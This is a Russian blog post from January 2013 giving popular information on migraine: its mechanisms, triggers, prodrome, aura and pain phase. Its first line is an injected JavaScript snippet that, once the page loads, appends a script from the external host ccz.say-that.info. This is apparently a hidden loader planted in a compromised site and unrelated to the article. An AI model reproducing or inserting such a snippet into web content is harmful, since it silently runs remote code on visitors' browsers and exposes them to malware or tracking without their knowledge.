(function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://ccz.say-that.info' + '/?82845=6aDp77v_8fL-9vT57qCspKSurw'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window);

суббота, 5 января 2013 г.

Народная медицина. Избавляемся от МИГРЕНИ


 Мигрень – это повышенная реакция нервной системы организма на внешние или внутренние факторы, попытка адаптации к которым вызывает сильные приступообразные головные боли.

Отличительная особенность мигрени симптомов от других видов головной боли состоит в том, что пульсирующая боль, начинаясь в каком-то одном участке головы, впоследствии охватывает не всю голову, а только ее половину. Обычно у каждого больного начало боли локализуется в одном и том же месте. Хотя нередки случаи смены «полярности» от приступа к приступу или перетекания боли на другую половину головы во время приступа. Характерной чертой для приступов мигрени являются четкие временные ограничения: приступ не может длиться более 72-х часов и в то же время – менее 3-х. Более двух третьих страдающих от мигрени – женщины. Обычно впервые болезнь дает о себе знать между началом полового созревания и 35 годами. Заканчиваются мигренозные приступы с наступление менопаузы у женщин и к 50 – 60 годам – у мужчин.


Причины мигрени и механизм ее возникновения

Нервная система организма ежесекундно реагирует как на колебания параметров его внутренних систем, так и на изменяющиеся факторы внешней среды. У людей с врожденной повышенной возбудимостью наступает неадекватный выброс биоактивных химических веществ и гормонов в кровь, в результате чего внутричерепное кровообращение нарушается, действующие на болевые рецепторы сосудов головного мозга обменные процессы активируются, а болевой порог – снижается. Результатом запуска этого механизма адаптации становятся мигренозные приступы, в реализации которых участвует не только болевая система мозга, но и практически вся вегетативная система организма.

Раньше мигрени причиной считался спазм сосудов головного мозга или падение их тонуса, что не совсем отвечало действительности, поэтому и мигрени лечение часто не приносило результатов. В настоящий момент известно, что приступ состоит из двух фаз. В первой фазе действительно имеют место спазмы сосудов головного мозга и мозговой оболочки. В результате – резкое побледнение лица, нарушение зрительного восприятия (туман в глазах, светящиеся точки или линии, выпадение сегментов обзора) либо другие нарушения. Падение тонуса сосудов, располагающихся в твердой мозговой оболочке,  происходит во второй фазе, и увеличенное пульсовое колебание их стенок служит причиной возникновения болевого синдрома. Если механизм возникновения приступа более-менее понятен, то мигрени причины, запускающие его, до сих пор не ясны. Возможно, программа запуска сложных биологических сдвигов заложена на генном уровне (не случайно почти у 90% больных в роду имелись предки, у которых наблюдались мигрени симптомы).
Спровоцировать развитие приступа могут следующие факторы:

эмоциональный стресс, депрессия, состояние беспокойства
сильное утомление, физическое или умственное
духота в помещении
перепады атмосферного давления, неблагоприятные погодные условия, магнитные бури
голодание
недосыпание или, наоборот, избыточный сон
продукты, содержащие тирамин (орехи, какао, шоколад, сыры, бобовые, сельдерей, помидоры). Либо – нитраты (сосиски, ветчина, салями, бекон)
курение, алкоголь
напитки (в больших дозах), содержащих кофеин (кофе, чай, кола)
цитрусовые (их кислоты являются провокаторами, особенно для аллергиков)
раздражающие запахи
мерцающий или яркий свет
у женщин – ежемесячные гормональные изменения в организме, гормональная терапия
употребление больших доз гистамина (содержится в пиве и красном вине)
У каждого больного имеются свои, присущие только ему, факторы, способные спровоцировать приступ мигрени. Избегание провоцирующих факторов, и как следствие, предупреждение приступов является лучшим способом мигрени лечения.

Симптомы мигрени

Как правило, мигрень за несколько часов предупреждает о своем приходе (т.н. продромальная фаза). Резкая смена настроения, раздражительность, беспокойство, чувство усталости, сонливость, повышенная чувствительность к яркому свету, шуму, запахам – все эти мигрени симптомы являются предвестниками приступа. К ним может добавляться появление «волчьего» аппетита или полное его отсутствие, задержка в организме жидкости.

Следующая фаза – появление ауры (классическая мигрень, наблюдается приблизительно у 25% больных). В основном проявляется нарушением зрительных восприятий. Характеризуются светящимися вспышками, шарами, зигзагами, огненными фигурами, туманом или рябью, скотомами – выпадением одного или нескольких участков зрения  вплоть до временной слепоты. Иногда больной может видеть окружающее в искаженном виде – сильно вытянутом или, наоборот, чересчур уменьшенном, иногда со сменой окраски (т.н. «синдром Алисы», названный так благодаря описанным Л. Кэрроллом в повести «Алиса в стране чудес» явлениям и встречающийся чаще у детей). Кроме офтальмических мигрени симптомов, могут наблюдаться чувствительные расстройства (онемение), нарушение речи или координации движений. Длительность ауры – от нескольких минут до часа, после чего все нарушения исчезают.

Вслед за аурой после небольшого «светлого» промежутка начинается собственно мигрень – появляется боль. Болевая фаза при простой мигрени (без ауры) может начинаться без предвестников. На одной стороне головы в области виска, глазницы или темени (значительно реже) сразу начинается пульсирующая (реже – распирающая) головная боль, усиливающаяся во время физической или умственной нагрузки и нарастающая в течение 2-5 часов. Сопровождаться может тошнотой и/или рвотой, приступами болей в животе, непереносимостью яркого света – опусканием век, болезненностью при движении глазных яблок, громких звуков или запахов. Болезненный участок отекает, височная артерия набухает и пульсирует, ее биение воспринимается как «удар молота». Появляется слезоточивость, бледность или гиперемия (покраснение) кожных покровов. Если боль носит распирающий характер, то она может распространиться на другую половину головы, а иногда и с самого начала быть двусторонней. Длительность болевого приступа колеблется от нескольких часов до 3-х суток. Затем наступает разрешение – рвота прекращается, головная боль уменьшается, сменяясь сонливостью. Восстановление организма до полной нормализации функционирования всех его сенсорных систем может длиться несколько дней. Частота возникновения приступов – от двух раз в неделю до нескольких раз в течение года.

Комментариев нет:

Отправить комментарий